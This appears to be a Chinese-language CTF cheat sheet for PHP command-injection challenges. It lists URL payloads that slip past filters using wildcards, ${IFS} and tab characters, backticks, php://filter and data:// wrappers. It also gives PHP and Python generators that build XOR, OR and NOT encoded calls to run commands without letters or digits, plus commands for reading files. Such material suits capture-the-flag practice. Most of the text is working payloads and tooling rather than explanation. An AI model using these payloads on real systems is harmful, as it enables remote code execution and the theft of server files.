# tip
?c=/???/????64 ????.??? 也就是?c=/bin/base64 flag.php
?c=tac<>fla\g.php||
?c=ta\c${IFS}../../../fla?||
过滤flag
system("ls /");
system("tac fl*");
过滤system
echo `tac *`;
过滤空格
echo%09`tac%09*`;
过滤echo `
?c=include$_POST[a]?>
post:a=php://filter/read=convert.base64-encode/resource=flag.php
伪协议
include语句
?c=data:text/plain,<?=system("tac fla*");?>
# 过滤数字和字母
戳此
# 异或
| <?php |
| |
| |
| |
| $myfile = fopen("xor_rce.txt", "w"); |
| $contents=""; |
| for ($i=0; $i < 256; $i++) { |
| for ($j=0; $j <256 ; $j++) { |
| |
| if($i<16){ |
| $hex_i='0'.dechex($i); |
| } |
| else{ |
| $hex_i=dechex($i); |
| } |
| if($j<16){ |
| $hex_j='0'.dechex($j); |
| } |
| else{ |
| $hex_j=dechex($j); |
| } |
| $preg = '/[a-z0-9]/i'; |
| if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){ |
| echo ""; |
| } |
| |
| else{ |
| $a='%'.$hex_i; |
| $b='%'.$hex_j; |
| $c=(urldecode($a)^urldecode($b)); |
| if (ord($c)>=32&ord($c)<=126) { |
| $contents=$contents.$c." ".$a." ".$b."\n"; |
| } |
| } |
| |
| } |
| } |
| fwrite($myfile,$contents); |
| fclose($myfile); |
| |
| |
| |
| |
| import requests |
| import urllib |
| from sys import * |
| import os |
| def action(arg): |
| s1="" |
| s2="" |
| for i in arg: |
| f=open("xor_rce.txt","r") |
| while True: |
| t=f.readline() |
| if t=="": |
| break |
| if t[0]==i: |
| |
| s1+=t[2:5] |
| s2+=t[6:9] |
| break |
| f.close() |
| output="(\""+s1+"\"^\""+s2+"\")" |
| return(output) |
| |
| while True: |
| param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";" |
| print(param) |
| <?php |
| |
| |
| |
| $myfile = fopen("or_rce.txt", "w"); |
| $contents=""; |
| for ($i=0; $i < 256; $i++) { |
| for ($j=0; $j <256 ; $j++) { |
| |
| if($i<16){ |
| $hex_i='0'.dechex($i); |
| } |
| else{ |
| $hex_i=dechex($i); |
| } |
| if($j<16){ |
| $hex_j='0'.dechex($j); |
| } |
| else{ |
| $hex_j=dechex($j); |
| } |
| $preg = '/[0-9a-z]/i'; |
| if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){ |
| echo ""; |
| } |
| |
| else{ |
| $a='%'.$hex_i; |
| $b='%'.$hex_j; |
| $c=(urldecode($a)|urldecode($b)); |
| if (ord($c)>=32&ord($c)<=126) { |
| $contents=$contents.$c." ".$a." ".$b."\n"; |
| } |
| } |
| |
| } |
| } |
| fwrite($myfile,$contents); |
| fclose($myfile); |
| |
| |
| |
| |
| import requests |
| import urllib |
| from sys import * |
| import os |
| def action(arg): |
| s1="" |
| s2="" |
| for i in arg: |
| f=open("or_rce.txt","r") |
| while True: |
| t=f.readline() |
| if t=="": |
| break |
| if t[0]==i: |
| |
| s1+=t[2:5] |
| s2+=t[6:9] |
| break |
| f.close() |
| output="(\""+s1+"\"|\""+s2+"\")" |
| return(output) |
| |
| while True: |
| param=action(input("\n[+] your function:") )+action(input("[+] your command:"))+";" |
| print(param) |
# 取反
| <?php |
| |
| |
| |
| |
| fwrite(STDOUT,'[+]your function: '); |
| |
| $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); |
| |
| fwrite(STDOUT,'[+]your command: '); |
| |
| $command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); |
| |
| echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');'; |
# 读取操作
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
grep
1、在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令:
grep test *file
strings
# 查找
grep flag flag.php 查找 flag.php 文件中含有 flag 的那一行,并且打印出来
